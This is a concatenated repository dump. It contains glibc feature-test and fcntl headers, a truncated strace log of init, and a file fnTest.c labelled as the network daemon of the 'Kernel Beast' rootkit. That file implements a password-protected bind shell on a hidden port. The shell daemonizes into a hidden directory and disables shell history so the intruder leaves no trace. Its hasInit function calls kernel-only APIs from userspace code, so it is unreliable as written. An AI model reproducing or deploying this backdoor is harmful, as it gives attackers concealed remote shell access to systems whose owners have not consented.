_ISOC99_SOURCE Extensions to ISO C89 from ISO C99. 28 | _POSIX_SOURCE IEEE Std 1003.1. 29 | _POSIX_C_SOURCE If ==1, like _POSIX_SOURCE; if >=2 add IEEE Std 1003.2; 30 | if >=199309L, add IEEE Std 1003.1b-1993; 31 | if >=199506L, add IEEE Std 1003.1c-1995; 32 | if >=200112L, all of IEEE 1003.1-2004 33 | _XOPEN_SOURCE Includes POSIX and XPG things. Set to 500 if 34 | Single Unix conformance is wanted, to 600 for the 35 | upcoming sixth revision. 36 | _XOPEN_SOURCE_EXTENDED XPG things and X/Open Unix extensions. 37 | _LARGEFILE_SOURCE Some more functions for correct standard I/O. 38 | _LARGEFILE64_SOURCE Additional functionality from LFS for large files. 39 | _FILE_OFFSET_BITS=N Select default filesystem interface. 40 | _BSD_SOURCE ISO C, POSIX, and 4.3BSD things. 41 | _SVID_SOURCE ISO C, POSIX, and SVID things. 42 | _ATFILE_SOURCE Additional *at interfaces. 43 | _GNU_SOURCE All of the above, plus GNU extensions. 44 | _REENTRANT Select additionally reentrant object. 45 | _THREAD_SAFE Same as _REENTRANT, often used by other systems. 46 | _FORTIFY_SOURCE If set to numeric value > 0 additional security 47 | measures are defined, according to level. 48 | 49 | The `-ansi' switch to the GNU C compiler defines __STRICT_ANSI__. 50 | If none of these are defined, the default is to have _SVID_SOURCE, 51 | _BSD_SOURCE, and _POSIX_SOURCE set to one and _POSIX_C_SOURCE set to 52 | 200112L. If more than one of these are defined, they accumulate. 53 | For example __STRICT_ANSI__, _POSIX_SOURCE and _POSIX_C_SOURCE 54 | together give you ISO C, 1003.1, and 1003.2, but nothing else. 55 | 56 | These are defined by this file and are used by the 57 | header files to decide what to declare or define: 58 | 59 | __USE_ISOC99 Define ISO C99 things. 60 | __USE_POSIX Define IEEE Std 1003.1 things. 61 | __USE_POSIX2 Define IEEE Std 1003.2 things. 62 | __USE_POSIX199309 Define IEEE Std 1003.1, and .1b things. 63 | __USE_POSIX199506 Define IEEE Std 1003.1, .1b, .1c and .1i things. 64 | __USE_XOPEN Define XPG things. 65 | __USE_XOPEN_EXTENDED Define X/Open Unix things. 66 | __USE_UNIX98 Define Single Unix V2 things. 67 | __USE_XOPEN2K Define XPG6 things. 68 | __USE_LARGEFILE Define correct standard I/O things. 69 | __USE_LARGEFILE64 Define LFS things with separate names. 70 | __USE_FILE_OFFSET64 Define 64bit interface as default. 71 | __USE_BSD Define 4.3BSD things. 72 | __USE_SVID Define SVID things. 73 | __USE_MISC Define things common to BSD and System V Unix. 74 | __USE_ATFILE Define *at interfaces and AT_* constants for them. 75 | __USE_GNU Define GNU extensions. 76 | __USE_REENTRANT Define reentrant/thread-safe *_r functions. 77 | __USE_FORTIFY_LEVEL Additional security measures used, according to level. 78 | __FAVOR_BSD Favor 4.3BSD things in cases of conflict. 79 | 80 | The macros `__GNU_LIBRARY__', `__GLIBC__', and `__GLIBC_MINOR__' are 81 | defined by this file unconditionally. `__GNU_LIBRARY__' is provided 82 | only for compatibility. All new code should use the other symbols 83 | to test for features. 84 | 85 | All macros listed above as possibly being defined by this file are 86 | explicitly undefined if they are not explicitly defined. 87 | Feature-test macros that are not defined by the user or compiler 88 | but are implied by the other feature-test macros defined (or by the 89 | lack of any definitions) are defined by the file. */ 90 | 91 | 92 | /* Undefine everything, so we get a clean slate. */ 93 | #undef __USE_ISOC99 94 | #undef __USE_POSIX 95 | #undef __USE_POSIX2 96 | #undef __USE_POSIX199309 97 | #undef __USE_POSIX199506 98 | #undef __USE_XOPEN 99 | #undef __USE_XOPEN_EXTENDED 100 | #undef __USE_UNIX98 101 | #undef __USE_XOPEN2K 102 | #undef __USE_LARGEFILE 103 | #undef __USE_LARGEFILE64 104 | #undef __USE_FILE_OFFSET64 105 | #undef __USE_BSD 106 | #undef __USE_SVID 107 | #undef __USE_MISC 108 | #undef __USE_ATFILE 109 | #undef __USE_GNU 110 | #undef __USE_REENTRANT 111 | #undef __USE_FORTIFY_LEVEL 112 | #undef __FAVOR_BSD 113 | #undef __KERNEL_STRICT_NAMES 114 | 115 | /* Suppress kernel-name space pollution unless user expressedly asks 116 | for it. */ 117 | #ifndef _LOOSE_KERNEL_NAMES 118 | # define __KERNEL_STRICT_NAMES 119 | #endif 120 | 121 | /* Always use ISO C things. */ 122 | #define __USE_ANSI 1 123 | 124 | /* Convenience macros to test the versions of glibc and gcc. 125 | Use them like this: 126 | #if __GNUC_PREREQ (2,8) 127 | ... code requiring gcc 2.8 or later ... 128 | #endif 129 | Note - they won't work for gcc1 or glibc1, since the _MINOR macros 130 | were not defined then. */ 131 | #if defined __GNUC__ && defined __GNUC_MINOR__ 132 | # define __GNUC_PREREQ(maj, min) \ 133 | ((__GNUC__ << 16) + __GNUC_MINOR__ >= ((maj) << 16) + (min)) 134 | #else 135 | # define __GNUC_PREREQ(maj, min) 0 136 | #endif 137 | 138 | 139 | /* If _BSD_SOURCE was defined by the user, favor BSD over POSIX. */ 140 | #if defined _BSD_SOURCE && \ 141 | !(defined _POSIX_SOURCE || defined _POSIX_C_SOURCE || \ 142 | defined _XOPEN_SOURCE || defined _XOPEN_SOURCE_EXTENDED || \ 143 | defined _GNU_SOURCE || defined _SVID_SOURCE) 144 | # define __FAVOR_BSD 1 145 | #endif 146 | 147 | /* If _GNU_SOURCE was defined by the user, turn on all the other features. */ 148 | #ifdef _GNU_SOURCE 149 | # undef _ISOC99_SOURCE 150 | # define _ISOC99_SOURCE 1 151 | # undef _POSIX_SOURCE 152 | # define _POSIX_SOURCE 1 153 | # undef _POSIX_C_SOURCE 154 | # define _POSIX_C_SOURCE 200112L 155 | # undef _XOPEN_SOURCE 156 | # define _XOPEN_SOURCE 600 157 | # undef _XOPEN_SOURCE_EXTENDED 158 | # define _XOPEN_SOURCE_EXTENDED 1 159 | # undef _LARGEFILE64_SOURCE 160 | # define _LARGEFILE64_SOURCE 1 161 | # undef _BSD_SOURCE 162 | # define _BSD_SOURCE 1 163 | # undef _SVID_SOURCE 164 | # define _SVID_SOURCE 1 165 | # undef _ATFILE_SOURCE 166 | # define _ATFILE_SOURCE 1 167 | #endif 168 | 169 | /* If nothing (other than _GNU_SOURCE) is defined, 170 | define _BSD_SOURCE and _SVID_SOURCE. */ 171 | #if (!defined __STRICT_ANSI__ && !defined _ISOC99_SOURCE && \ 172 | !defined _POSIX_SOURCE && !defined _POSIX_C_SOURCE && \ 173 | !defined _XOPEN_SOURCE && !defined _XOPEN_SOURCE_EXTENDED && \ 174 | !defined _BSD_SOURCE && !defined _SVID_SOURCE) 175 | # define _BSD_SOURCE 1 176 | # define _SVID_SOURCE 1 177 | #endif 178 | 179 | /* This is to enable the ISO C99 extension. Also recognize the old macro 180 | which was used prior to the standard acceptance. This macro will 181 | eventually go away and the features enabled by default once the ISO C99 182 | standard is widely adopted. */ 183 | #if (defined _ISOC99_SOURCE || defined _ISOC9X_SOURCE \ 184 | || (defined __STDC_VERSION__ && __STDC_VERSION__ >= 199901L)) 185 | # define __USE_ISOC99 1 186 | #endif 187 | 188 | /* If none of the ANSI/POSIX macros are defined, use POSIX.1 and POSIX.2 189 | (and IEEE Std 1003.1b-1993 unless _XOPEN_SOURCE is defined). */ 190 | #if ((!defined __STRICT_ANSI__ || (_XOPEN_SOURCE - 0) >= 500) && \ 191 | !defined _POSIX_SOURCE && !defined _POSIX_C_SOURCE) 192 | # define _POSIX_SOURCE 1 193 | # if defined _XOPEN_SOURCE && (_XOPEN_SOURCE - 0) < 500 194 | # define _POSIX_C_SOURCE 2 195 | # elif defined _XOPEN_SOURCE && (_XOPEN_SOURCE - 0) < 600 196 | # define _POSIX_C_SOURCE 199506L 197 | # else 198 | # define _POSIX_C_SOURCE 200112L 199 | # endif 200 | #endif 201 | 202 | #if defined _POSIX_SOURCE || _POSIX_C_SOURCE >= 1 || defined _XOPEN_SOURCE 203 | # define __USE_POSIX 1 204 | #endif 205 | 206 | #if defined _POSIX_C_SOURCE && _POSIX_C_SOURCE >= 2 || defined _XOPEN_SOURCE 207 | # define __USE_POSIX2 1 208 | #endif 209 | 210 | #if (_POSIX_C_SOURCE - 0) >= 199309L 211 | # define __USE_POSIX199309 1 212 | #endif 213 | 214 | #if (_POSIX_C_SOURCE - 0) >= 199506L 215 | # define __USE_POSIX199506 1 216 | #endif 217 | 218 | #if (_POSIX_C_SOURCE - 0) >= 200112L 219 | # define __USE_XOPEN2K 1 220 | #endif 221 | 222 | #ifdef _XOPEN_SOURCE 223 | # define __USE_XOPEN 1 224 | # if (_XOPEN_SOURCE - 0) >= 500 225 | # define __USE_XOPEN_EXTENDED 1 226 | # define __USE_UNIX98 1 227 | # undef _LARGEFILE_SOURCE 228 | # define _LARGEFILE_SOURCE 1 229 | # if (_XOPEN_SOURCE - 0) >= 600 230 | # define __USE_XOPEN2K 1 231 | # undef __USE_ISOC99 232 | # define __USE_ISOC99 1 233 | # endif 234 | # else 235 | # ifdef _XOPEN_SOURCE_EXTENDED 236 | # define __USE_XOPEN_EXTENDED 1 237 | # endif 238 | # endif 239 | #endif 240 | 241 | #ifdef _LARGEFILE_SOURCE 242 | # define __USE_LARGEFILE 1 243 | #endif 244 | 245 | #ifdef _LARGEFILE64_SOURCE 246 | # define __USE_LARGEFILE64 1 247 | #endif 248 | 249 | #if defined _FILE_OFFSET_BITS && _FILE_OFFSET_BITS == 64 250 | # define __USE_FILE_OFFSET64 1 251 | #endif 252 | 253 | #if defined _BSD_SOURCE || defined _SVID_SOURCE 254 | # define __USE_MISC 1 255 | #endif 256 | 257 | #ifdef _BSD_SOURCE 258 | # define __USE_BSD 1 259 | #endif 260 | 261 | #ifdef _SVID_SOURCE 262 | # define __USE_SVID 1 263 | #endif 264 | 265 | #ifdef _ATFILE_SOURCE 266 | # define __USE_ATFILE 1 267 | #endif 268 | 269 | #ifdef _GNU_SOURCE 270 | # define __USE_GNU 1 271 | #endif 272 | 273 | #if defined _REENTRANT || defined _THREAD_SAFE 274 | # define __USE_REENTRANT 1 275 | #endif 276 | 277 | #if defined _FORTIFY_SOURCE && _FORTIFY_SOURCE > 0 \ 278 | && defined __OPTIMIZE__ && __OPTIMIZE__ > 0 \ 279 | && (__GNUC_PREREQ (4, 1) \ 280 | || (defined __GNUC_RH_RELEASE__ && __GNUC_PREREQ (4, 0)) \ 281 | || (defined __GNUC_RH_RELEASE__ && __GNUC_PREREQ (3, 4) \ 282 | && __GNUC_MINOR__ == 4 \ 283 | && (__GNUC_PATCHLEVEL__ > 2 \ 284 | || (__GNUC_PATCHLEVEL__ == 2 && __GNUC_RH_RELEASE__ >= 8)))) 285 | # if _FORTIFY_SOURCE > 1 286 | # define __USE_FORTIFY_LEVEL 2 287 | # else 288 | # define __USE_FORTIFY_LEVEL 1 289 | # endif 290 | #else 291 | # define __USE_FORTIFY_LEVEL 0 292 | #endif 293 | 294 | /* We do support the IEC 559 math functionality, real and complex. */ 295 | #define __STDC_IEC_559__ 1 296 | #define __STDC_IEC_559_COMPLEX__ 1 297 | 298 | /* wchar_t uses ISO 10646-1 (2nd ed., published 2000-09-15) / Unicode 3.1. */ 299 | #define __STDC_ISO_10646__ 200009L 300 | 301 | /* This macro indicates that the installed library is the GNU C Library. 302 | For historic reasons the value now is 6 and this will stay from now 303 | on. The use of this variable is deprecated. Use __GLIBC__ and 304 | __GLIBC_MINOR__ now (see below) when you want to test for a specific 305 | GNU C library version and use the values in to get 306 | the sonames of the shared libraries. */ 307 | #undef __GNU_LIBRARY__ 308 | #define __GNU_LIBRARY__ 6 309 | 310 | /* Major and minor version number of the GNU C library package. Use 311 | these macros to test for features in specific releases. */ 312 | #define __GLIBC__ 2 313 | #define __GLIBC_MINOR__ 5 314 | 315 | #define __GLIBC_PREREQ(maj, min) \ 316 | ((__GLIBC__ << 16) + __GLIBC_MINOR__ >= ((maj) << 16) + (min)) 317 | 318 | /* Decide whether a compiler supports the long long datatypes. */ 319 | #if defined __GNUC__ \ 320 | || (defined __PGI && defined __i386__ ) \ 321 | || (defined __INTEL_COMPILER && (defined __i386__ || defined __ia64__)) \ 322 | || (defined __STDC_VERSION__ && __STDC_VERSION__ >= 199901L) 323 | # define __GLIBC_HAVE_LONG_LONG 1 324 | #endif 325 | 326 | /* This is here only because every header file already includes this one. */ 327 | #ifndef __ASSEMBLER__ 328 | # ifndef _SYS_CDEFS_H 329 | # include 330 | # endif 331 | 332 | /* If we don't have __REDIRECT, prototypes will be missing if 333 | __USE_FILE_OFFSET64 but not __USE_LARGEFILE[64]. */ 334 | # if defined __USE_FILE_OFFSET64 && !defined __REDIRECT 335 | # define __USE_LARGEFILE 1 336 | # define __USE_LARGEFILE64 1 337 | # endif 338 | 339 | #endif /* !ASSEMBLER */ 340 | 341 | /* Decide whether we can define 'extern inline' functions in headers. */ 342 | #if __GNUC_PREREQ (2, 7) && defined __OPTIMIZE__ \ 343 | && !defined __OPTIMIZE_SIZE__ && !defined __NO_INLINE__ 344 | # define __USE_EXTERN_INLINES 1 345 | #endif 346 | 347 | 348 | /* This is here only because every header file already includes this one. 349 | Get the definitions of all the appropriate `__stub_FUNCTION' symbols. 350 | contains `#define __stub_FUNCTION' when FUNCTION is a stub 351 | that will always return failure (and set errno to ENOSYS). */ 352 | #include 353 | 354 | 355 | #endif /* features.h */ 356 | /* O_*, F_*, FD_* bit values for Linux. 357 | Copyright (C) 1995, 1996, 1997, 1998, 2000, 2004, 2006 358 | Free Software Foundation, Inc. 359 | This file is part of the GNU C Library. 360 | 361 | The GNU C Library is free software; you can redistribute it and/or 362 | modify it under the terms of the GNU Lesser General Public 363 | License as published by the Free Software Foundation; either 364 | version 2.1 of the License, or (at your option) any later version. 365 | 366 | The GNU C Library is distributed in the hope that it will be useful, 367 | but WITHOUT ANY WARRANTY; without even the implied warranty of 368 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 369 | Lesser General Public License for more details. 370 | 371 | You should have received a copy of the GNU Lesser General Public 372 | License along with the GNU C Library; if not, write to the Free 373 | Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 374 | 02111-1307 USA. */ 375 | 376 | #ifndef _FCNTL_H 377 | # error "Never use directly; include instead." 378 | #endif 379 | 380 | #include 381 | #ifdef __USE_GNU 382 | # include 383 | #endif 384 | 385 | 386 | /* open/fcntl - O_SYNC is only implemented on blocks devices and on files 387 | located on an ext2 file system */ 388 | #define O_ACCMODE 0003 389 | #define O_RDONLY 00 390 | #define O_WRONLY 01 391 | #define O_RDWR 02 392 | #define O_CREAT 0100 /* not fcntl */ 393 | #define O_EXCL 0200 /* not fcntl */ 394 | #define O_NOCTTY 0400 /* not fcntl */ 395 | #define O_TRUNC 01000 /* not fcntl */ 396 | #define O_APPEND 02000 397 | #define O_NONBLOCK 04000 398 | #define O_NDELAY O_NONBLOCK 399 | #define O_SYNC 010000 400 | #define O_FSYNC O_SYNC 401 | #define O_ASYNC 020000 402 | 403 | #ifdef __USE_GNU 404 | # define O_DIRECT 040000 /* Direct disk access. */ 405 | # define O_DIRECTORY 0200000 /* Must be a directory. */ 406 | # define O_NOFOLLOW 0400000 /* Do not follow links. */ 407 | # define O_NOATIME 01000000 /* Do not set atime. */ 408 | #endif 409 | 410 | /* For now Linux has synchronisity options for data and read operations. 411 | We define the symbols here but let them do the same as O_SYNC since 412 | this is a superset. */ 413 | #if defined __USE_POSIX199309 || defined __USE_UNIX98 414 | # define O_DSYNC O_SYNC /* Synchronize data. */ 415 | # define O_RSYNC O_SYNC /* Synchronize read operations. */ 416 | #endif 417 | 418 | #ifdef __USE_LARGEFILE64 419 | # define O_LARGEFILE 0100000 420 | #endif 421 | 422 | /* Values for the second argument to `fcntl'. */ 423 | #define F_DUPFD 0 /* Duplicate file descriptor. */ 424 | #define F_GETFD 1 /* Get file descriptor flags. */ 425 | #define F_SETFD 2 /* Set file descriptor flags. */ 426 | #define F_GETFL 3 /* Get file status flags. */ 427 | #define F_SETFL 4 /* Set file status flags. */ 428 | #ifndef __USE_FILE_OFFSET64 429 | # define F_GETLK 5 /* Get record locking info. */ 430 | # define F_SETLK 6 /* Set record locking info (non-blocking). */ 431 | # define F_SETLKW 7 /* Set record locking info (blocking). */ 432 | #else 433 | # define F_GETLK F_GETLK64 /* Get record locking info. */ 434 | # define F_SETLK F_SETLK64 /* Set record locking info (non-blocking).*/ 435 | # define F_SETLKW F_SETLKW64 /* Set record locking info (blocking). */ 436 | #endif 437 | #define F_GETLK64 12 /* Get record locking info. */ 438 | #define F_SETLK64 13 /* Set record locking info (non-blocking). */ 439 | #define F_SETLKW64 14 /* Set record locking info (blocking). */ 440 | 441 | #if defined __USE_BSD || defined __USE_UNIX98 442 | # define F_SETOWN 8 /* Get owner of socket (receiver of SIGIO). */ 443 | # define F_GETOWN 9 /* Set owner of socket (receiver of SIGIO). */ 444 | #endif 445 | 446 | #ifdef __USE_GNU 447 | # define F_SETSIG 10 /* Set number of signal to be sent. */ 448 | # define F_GETSIG 11 /* Get number of signal to be sent. */ 449 | #endif 450 | 451 | #ifdef __USE_GNU 452 | # define F_SETLEASE 1024 /* Set a lease. */ 453 | # define F_GETLEASE 1025 /* Enquire what lease is active. */ 454 | # define F_NOTIFY 1026 /* Request notfications on a directory. */ 455 | #endif 456 | 457 | /* For F_[GET|SET]FD. */ 458 | #define FD_CLOEXEC 1 /* actually anything with low bit set goes */ 459 | 460 | /* For posix fcntl() and `l_type' field of a `struct flock' for lockf(). */ 461 | #define F_RDLCK 0 /* Read lock. */ 462 | #define F_WRLCK 1 /* Write lock. */ 463 | #define F_UNLCK 2 /* Remove lock. */ 464 | 465 | /* For old implementation of bsd flock(). */ 466 | #define F_EXLCK 4 /* or 3 */ 467 | #define F_SHLCK 8 /* or 4 */ 468 | 469 | #ifdef __USE_BSD 470 | /* Operations for bsd flock(), also used by the kernel implementation. */ 471 | # define LOCK_SH 1 /* shared lock */ 472 | # define LOCK_EX 2 /* exclusive lock */ 473 | # define LOCK_NB 4 /* or'd with one of the above to prevent 474 | blocking */ 475 | # define LOCK_UN 8 /* remove lock */ 476 | #endif 477 | 478 | #ifdef __USE_GNU 479 | # define LOCK_MAND 32 /* This is a mandatory flock: */ 480 | # define LOCK_READ 64 /* ... which allows concurrent read operations. */ 481 | # define LOCK_WRITE 128 /* ... which allows concurrent write operations. */ 482 | # define LOCK_RW 192 /* ... Which allows concurrent read & write operations. */ 483 | #endif 484 | 485 | #ifdef __USE_GNU 486 | /* Types of directory notifications that may be requested with F_NOTIFY. */ 487 | # define DN_ACCESS 0x00000001 /* File accessed. */ 488 | # define DN_MODIFY 0x00000002 /* File modified. */ 489 | # define DN_CREATE 0x00000004 /* File created. */ 490 | # define DN_DELETE 0x00000008 /* File removed. */ 491 | # define DN_RENAME 0x00000010 /* File renamed. */ 492 | # define DN_ATTRIB 0x00000020 /* File changed attibutes. */ 493 | # define DN_MULTISHOT 0x80000000 /* Don't remove notifier. */ 494 | #endif 495 | 496 | struct flock 497 | { 498 | short int l_type; /* Type of lock: F_RDLCK, F_WRLCK, or F_UNLCK. */ 499 | short int l_whence; /* Where `l_start' is relative to (like `lseek'). */ 500 | #ifndef __USE_FILE_OFFSET64 501 | __off_t l_start; /* Offset where the lock begins. */ 502 | __off_t l_len; /* Size of the locked area; zero means until EOF. */ 503 | #else 504 | __off64_t l_start; /* Offset where the lock begins. */ 505 | __off64_t l_len; /* Size of the locked area; zero means until EOF. */ 506 | #endif 507 | __pid_t l_pid; /* Process holding the lock. */ 508 | }; 509 | 510 | #ifdef __USE_LARGEFILE64 511 | struct flock64 512 | { 513 | short int l_type; /* Type of lock: F_RDLCK, F_WRLCK, or F_UNLCK. */ 514 | short int l_whence; /* Where `l_start' is relative to (like `lseek'). */ 515 | __off64_t l_start; /* Offset where the lock begins. */ 516 | __off64_t l_len; /* Size of the locked area; zero means until EOF. */ 517 | __pid_t l_pid; /* Process holding the lock. */ 518 | }; 519 | #endif 520 | 521 | /* Define some more compatibility macros to be backward compatible with 522 | BSD systems which did not managed to hide these kernel macros. */ 523 | #ifdef __USE_BSD 524 | # define FAPPEND O_APPEND 525 | # define FFSYNC O_FSYNC 526 | # define FASYNC O_ASYNC 527 | # define FNONBLOCK O_NONBLOCK 528 | # define FNDELAY O_NDELAY 529 | #endif /* Use BSD. */ 530 | 531 | /* Advise to `posix_fadvise'. */ 532 | #ifdef __USE_XOPEN2K 533 | # define POSIX_FADV_NORMAL 0 /* No further special treatment. */ 534 | # define POSIX_FADV_RANDOM 1 /* Expect random page references. */ 535 | # define POSIX_FADV_SEQUENTIAL 2 /* Expect sequential page references. */ 536 | # define POSIX_FADV_WILLNEED 3 /* Will need these pages. */ 537 | # define POSIX_FADV_DONTNEED 4 /* Don't need these pages. */ 538 | # define POSIX_FADV_NOREUSE 5 /* Data will be accessed once. */ 539 | #endif 540 | 541 | 542 | #ifdef __USE_GNU 543 | /* Flags for SYNC_FILE_RANGE. */ 544 | # define SYNC_FILE_RANGE_WAIT_BEFORE 1 /* Wait upon writeout of all pages 545 | in the range before performing the 546 | write. */ 547 | # define SYNC_FILE_RANGE_WRITE 2 /* Initiate writeout of all those 548 | dirty pages in the range which are 549 | not presently under writeback. */ 550 | # define SYNC_FILE_RANGE_WAIT_AFTER 4 /* Wait upon writeout of all pages in 551 | the range after performing the 552 | write. */ 553 | 554 | /* Flags for SPLICE and VMSPLICE. */ 555 | # define SPLICE_F_MOVE 1 /* Move pages instead of copying. */ 556 | # define SPLICE_F_NONBLOCK 2 /* Don't block on the pipe splicing 557 | (but we may still block on the fd 558 | we splice from/to). */ 559 | # define SPLICE_F_MORE 4 /* Expect more data. */ 560 | # define SPLICE_F_GIFT 8 /* Pages passed in are a gift. */ 561 | #endif 562 | 563 | __BEGIN_DECLS 564 | 565 | #ifdef __USE_GNU 566 | 567 | /* Provide kernel hint to read ahead. */ 568 | extern ssize_t readahead (int __fd, __off64_t __offset, size_t __count) 569 | __THROW; 570 | 571 | 572 | /* Selective file content synch'ing. */ 573 | extern int sync_file_range (int __fd, __off64_t __from, __off64_t __to, 574 | unsigned int __flags); 575 | 576 | 577 | /* Splice address range into a pipe. */ 578 | extern int vmsplice (int __fdout, const struct iovec *__iov, size_t __count, 579 | unsigned int __flags); 580 | 581 | /* Splice two files together. */ 582 | extern int splice (int __fdin, __off64_t *__offin, int __fdout, 583 | __off64_t *__offout, size_t __len, unsigned int __flags) 584 | __THROW; 585 | 586 | /* In-kernel implementation of tee for pipe buffers. */ 587 | extern int tee (int __fdin, int __fdout, size_t __len, unsigned int __flags) 588 | __THROW; 589 | 590 | #endif 591 | 592 | __END_DECLS 593 | -------------------------------------------------------------------------------- /fnTest.c: -------------------------------------------------------------------------------- 1 | /* 2 | Kernel Beast Ver #1.0 - Network Daemon 3 | Copyright Ph03n1X of IPSECS (c) 2011 4 | Get more research of ours http://ipsecs.com 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include "config.h" 19 | 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | 43 | #include "config.h" 44 | #define MAXLISTEN 5 45 | 46 | void bindshell(); 47 | void error_ret(char *); 48 | void enterpass(int); 49 | 50 | char *argv[] = { "bash", "-i", NULL }; 51 | char *envp[] = { "TERM=linux", "PS1=$", "BASH_HISTORY=/dev/null", 52 | "HISTORY=/dev/null", "history=/dev/null", "HOME=/usr/_sh4x_","HISTFILE=/dev/null", 53 | "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; 54 | 55 | char *banner = 56 | "\npassword:\n"; 57 | 58 | void error_ret(char *s){ 59 | printf("ERROR! Error occured on your system!\n"); 60 | perror(s); 61 | exit(-1); 62 | } 63 | 64 | void enterpass(int s){ 65 | char *prompt="Password [displayed to screen]: "; 66 | char *motd="<< Welcome >>\n"; 67 | char buffer[64]; 68 | 69 | //write(s,banner,strlen(banner)); 70 | //write(s,prompt,strlen(prompt)); 71 | read(s,buffer,sizeof(buffer)); 72 | if(!strncmp(buffer, _RPASSWORD_, strlen(_RPASSWORD_))) { 73 | write(s,motd,strlen(motd)); 74 | }else { 75 | //write(s,"Wrong!\n", 7); 76 | close(s); 77 | _exit(0); 78 | } 79 | } 80 | 81 | void bindshell() 82 | { 83 | struct sockaddr_in sockaddr,cliaddr; 84 | int sock,cli,clilen,pid,child; 85 | FILE *fd; 86 | 87 | sockaddr.sin_family = AF_INET; 88 | sockaddr.sin_port = htons(_HIDE_PORT_); 89 | sockaddr.sin_addr.s_addr = INADDR_ANY; 90 | 91 | sock=socket(AF_INET, SOCK_STREAM, 0); 92 | if(sock < 0) 93 | error_ret("socket"); 94 | if(bind(sock,(struct sockaddr *)&sockaddr,sizeof(sockaddr))<0) 95 | error_ret("bind"); 96 | if(listen(sock,MAXLISTEN)<0) 97 | error_ret("listen"); 98 | if((pid=fork())!=0){ 99 | printf("Daemon running with PID = %i\n",pid); 100 | exit(0); 101 | } 102 | 103 | setsid(); 104 | chdir(_H4X_PATH_); 105 | umask(0); 106 | close(0); 107 | 108 | signal(SIGCHLD, SIG_IGN); 109 | while(1){ 110 | clilen=sizeof(cliaddr); 111 | cli=accept(sock,(struct sockaddr *)&cliaddr,&clilen); 112 | if(cli<0) 113 | continue; 114 | if((child=fork())==0){ 115 | close(sock); 116 | dup2(cli,0); 117 | dup2(cli,1); 118 | dup2(cli,2); 119 | //close(0); 120 | //fid = fcntl(cli, F_DUPFD, 0); 121 | enterpass(cli); 122 | execve("/bin/bash", argv, envp); 123 | close(child); 124 | close(cli); 125 | } 126 | } 127 | return; 128 | } 129 | 130 | /* 131 | Modified from log_to_file() mercenary code 132 | why don't we modify thc-vlogger? because that'z your job 133 | */ 134 | int hasInit() 135 | { 136 | struct file *file = NULL; 137 | mm_segment_t fs; 138 | int error; 139 | char fbuf[100]={'\0'}; 140 | 141 | /*log name*/ 142 | //snprintf(accountlog,sizeof(accountlog),"%s/%s.%i",_H4X_PATH_,_LOGFILE_,current->uid); 143 | file = filp_open(MAGIC_REBOOT, O_CREAT|O_APPEND, 00644); 144 | if(IS_ERR(file)){ 145 | error=PTR_ERR(file); 146 | goto out; 147 | } 148 | 149 | error = -EACCES; 150 | if(!S_ISREG(file->f_dentry->d_inode->i_mode)) 151 | goto out_err; 152 | 153 | error = -EIO; 154 | if(!file->f_op->write) 155 | goto out_err; 156 | 157 | error = 0; 158 | fs = get_fs(); 159 | set_fs(KERNEL_DS); 160 | file->f_op->read(file,fbuf,strlen(fbuf)-1,0); 161 | set_fs(fs); 162 | filp_close(file,NULL); 163 | printf("File Conten:%s\n",fbuf); 164 | goto out; 165 | 166 | out: 167 | return error; 168 | 169 | out_err: 170 | filp_close (file,NULL); 171 | goto out; 172 | } 173 | 174 | 175 | int main(int argc, char **argv) 176 | { 177 | //bindshell(); 178 | hasInit(); 179 | return 0; 180 | } 181 | -------------------------------------------------------------------------------- /init.log: -------------------------------------------------------------------------------- 1 | execve("/sbin/init", ["init", "6"], [/* 22 vars */]) = 0 2 | brk(0) = 0x926e000 3 | access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) 4 | open("/etc/ld.so.cache", O_RDONLY) = 3 5 | fstat64(3, {st_mode=S_IFREG|0644, st_size=38920, ...}) = 0 6 | mmap2(NULL, 38920, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fc9000 7 | close(3) = 0 8 | open("/lib/libsepol.so.1", O_RDONLY) = 3 9 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\277\226\0004\0\0\0"..., 512) = 512 10 | fstat64(3, {st_mode=S_IFREG|0755, st_size=245376, ...}) = 0 11 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc8000 12 | mmap2(0x969000, 285024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x969000 13 | mmap2(0x9a4000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3b) = 0x9a4000 14 | mmap2(0x9a5000, 39264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x9a5000 15 | close(3) = 0 16 | open("/lib/libselinux.so.1", O_RDONLY) = 3 17 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240%\225\0004\0\0\0"..., 512) = 512 18 | fstat64(3, {st_mode=S_IFREG|0755, st_size=93508, ...}) = 0 19 | mmap2(0x94f000, 97120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x94f000 20 | mmap2(0x965000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15) = 0x965000 21 | close(3) = 0 22 | open("/lib/libc.so.6", O_RDONLY) = 3 23 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340_{\0004\0\0\0"..., 512) = 512 24 | fstat64(3, {st_mode=S_IFREG|0755, st_size=1611564, ...}) = 0 25 | mmap2(0x7a0000, 1328580, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7a0000 26 | mmap2(0x8df000, 12288, PROT_READ|PROT_WRITE, 